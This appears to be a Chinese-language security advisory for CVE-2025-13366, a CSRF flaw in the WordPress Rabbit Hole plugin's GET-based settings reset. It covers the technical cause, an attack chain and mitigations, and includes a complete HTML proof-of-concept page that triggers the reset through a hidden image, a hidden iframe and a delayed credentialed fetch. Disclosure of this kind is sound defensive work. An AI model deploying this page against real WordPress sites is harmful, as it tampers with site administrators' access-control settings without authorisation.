CVE-2025-13366 WordPress Rabbit Hole插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-13366

漏洞类型

CSRF (跨站请求伪造)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WordPress Rabbit Hole Plugin

漏洞概述

CVE-2025-13366是WordPress Rabbit Hole插件中的一个跨站请求伪造（CSRF）漏洞。该插件用于控制WordPress内容访问权限，在1.1及之前的所有版本中存在严重的安全缺陷。由于插件的设置重置功能缺少正确的nonce验证机制，未经身份认证的攻击者可以通过伪造请求来重置插件设置。攻击者只需要诱导网站管理员点击恶意链接或访问包含恶意内容的页面（如图片标签、超链接等），即可触发重置操作。更为严重的是，该插件的重置功能使用GET请求实现，这使得攻击利用变得极为简单，攻击者可以直接通过在第三方网站上嵌入恶意图像标签或链接来触发漏洞。此漏洞可能导致网站安全配置被清除，影响内容的访问控制策略。

技术细节

漏洞根源在于Rabbit Hole插件的admin.php文件中，reset功能（第7行附近）缺少WordPress nonce验证机制。WordPress的nonce机制是一种防CSRF保护措施，通过生成带有时间戳和随机令牌的验证字符串来确保请求来自合法的管理后台。在正常情况下，WordPress插件的重置功能应该使用wp_verify_nonce()函数验证请求中的nonce值，但Rabbit Hole插件的reset操作直接处理请求参数而未进行任何验证。由于reset操作使用GET请求，攻击者可以构造形如https://target-site.com/wp-admin/admin.php?page=rabbit-hole&action=reset的URL，并通过社会工程手段诱骗管理员访问。浏览器会自动携带目标网站的Cookie发送请求，服务器无法区分这是管理员的合法操作还是攻击者伪造的请求。

攻击链分析

STEP 1

步骤1

攻击者创建恶意网页，包含针对Rabbit Hole插件reset功能的CSRF payload

STEP 2

步骤2

攻击者通过钓鱼邮件、社交媒体或其他渠道诱导目标网站管理员访问恶意页面

STEP 3

步骤3

受害者浏览器自动向目标WordPress站点发送GET请求，包含有效的管理员会话Cookie

STEP 4

步骤4

目标服务器收到请求，由于缺少nonce验证，直接执行reset操作清除插件设置

STEP 5

步骤5

Rabbit Hole插件的安全配置被重置为默认值，可能导致内容访问控制策略失效

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-13366 CSRF PoC for WordPress Rabbit Hole Plugin -->
<!--诱骗已登录的管理员访问此页面即可触发漏洞-->
<html>
<body>
  <h1>Rabbit Hole Plugin CSRF Exploit</h1>
  <p>点击下方链接或等待自动触发（部分浏览器会自动加载图片）</p>
  
  <!-- 方法1: 使用img标签自动触发GET请求 -->
  <img src="http://target-wordpress-site.com/wp-admin/admin.php?page=rabbit-hole&action=reset" width="0" height="0" style="display:none;" />
  
  <!-- 方法2: 使用隐藏的iframe -->
  <iframe src="http://target-wordpress-site.com/wp-admin/admin.php?page=rabbit-hole&action=reset" style="display:none;"></iframe>
  
  <!-- 方法3: 使用JavaScript自动跳转 -->
  <script>
    // 延迟执行以增加隐蔽性
    setTimeout(function() {
      // 构造重置请求URL
      var targetUrl = 'http://target-wordpress-site.com/wp-admin/admin.php?page=rabbit-hole&action=reset';
      // 使用fetch发送请求（需要管理员已登录且会话有效）
      fetch(targetUrl, {
        method: 'GET',
        credentials: 'include'
      }).then(function(response) {
        console.log('Reset request sent');
      }).catch(function(error) {
        console.log('Request failed:', error);
      });
    }, 2000); // 2秒后自动执行
  </script>
  
  <p><strong>注意：</strong>此PoC仅用于安全研究和授权测试，未经许可使用此代码进行攻击属于违法行为。</p>
</body>
</html>

影响范围

WordPress Rabbit Hole Plugin <= 1.1

防御指南

临时缓解措施

在官方修复版本发布前，可采取以下临时措施：1) 暂时禁用或删除Rabbit Hole插件；2) 加强对管理员账户的安全防护，使用强密码和双因素认证；3) 对管理员进行安全意识培训，提高对钓鱼攻击的警惕性；4) 监控网站日志，关注异常的admin.php请求；5) 考虑使用网站应用防火墙（WAF）规则阻止可疑的reset请求。